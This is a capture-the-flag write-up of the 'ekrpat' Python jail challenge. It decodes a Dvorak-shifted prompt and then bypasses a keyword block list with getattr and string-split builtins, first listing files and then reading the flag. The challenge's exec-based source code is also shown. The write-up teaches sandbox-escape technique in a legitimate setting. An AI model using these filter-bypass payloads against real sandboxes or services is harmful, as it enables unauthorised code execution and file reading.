ekrpat
Category: misc
322 points
I made so few errors when creating this jail.
nc 34.72.64.224 8083
nc 35.231.20.75 8083
Created by Thomas (Seltzerz #6678)
Hint: Look down at where you’re typing.
Solution
nc 34.72.64.224 8083
Frg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -ekrpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv
>>> ugabuga
Wrong code to break out. Sorry, try again!
At the beginning I thought it was ciphered with some code. Luckly pnc4 found out, that ekrpat
refers to Dvorak
Keyboard Layout. After mapping the given text to dvorak, we got the below text:
You've broken my code! Escape without the help of eval, exec, import, open, os, read, system, and write. First, enter
'dvorak'. You will then get another input which you can use try to break out of the jail.
After typing dvorak
we end up in some kinda python jailbreak challenge.
Frg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -e
krpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv
>>> dvorak
>>> print(dir())
['code', 'keyword', 'text']
['code', 'keyword', 'text']
['code', 'keyword', 'text']
['code', 'keyword', 'text']
['code', 'keyword', 'text']
['code', 'keyword', 'text']
['code', 'keyword', 'text']
['code', 'keyword', 'text']
But when we tried to import module, it didn’t work.
Frg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -e
krpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv
>>> dvorak
import os
Play by the rules!!! Try again.
Let’s try to trick it ;-)
Frg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -ekrpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv
>>> dvorak
>>> print(getattr(globals()['__builtins__'], '__imp' + 'ort__')('os').listdir())
['.profile', '.bashrc', '.bash_logout', 'ynetd', 'Dockerfile', 'ekrpat.py', 'flag', 'ojal.']
['.profile', '.bashrc', '.bash_logout', 'ynetd', 'Dockerfile', 'ekrpat.py', 'flag', 'ojal.']
['.profile', '.bashrc', '.bash_logout', 'ynetd', 'Dockerfile', 'ekrpat.py', 'flag', 'ojal.']
['.profile', '.bashrc', '.bash_logout', 'ynetd', 'Dockerfile', 'ekrpat.py', 'flag', 'ojal.']
Play by the rules!!! Try again.
Ok, now we know the flag is placed in flag
file.
Frg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -ekrpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv
>>> dvorak
>>> print(getattr(globals()['__builtins__'], 'op' + 'en')('flag', 'r').read())
UMASS{dvorak_rules}
UMASS{dvorak_rules}
UMASS{dvorak_rules}
UMASS{dvorak_rules}
UMASS{dvorak_rules}
Play by the rules!!! Try again.
Ok, so here’s the flag ;-) And as a bonus I’ve taken a look into challenge code using same method as for flag
.
def main():
print('Frg-k. xprt.b mf jre.! >ojal. ,cydrgy yd. d.nl ru .kanw .q.jw cmlrpyw rl.bw row p.aew ofoy.mw abe ,pcy.v Ucpoyw .by.p -ekrpat-v Frg ,cnn yd.b i.y abryd.p cblgy ,dcjd frg jab go. ypf yr xp.at rgy ru yd. hacnv')
code = input('>>> ')
if code == 'dvorak':
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print('Play by the rules!!! Try again.')
return
else:
exec(text)
else:
print('Wrong code to break out. Sorry, try again!')
if __name__ == "__main__":
main()
Flag
UMASS{dvorak_rules}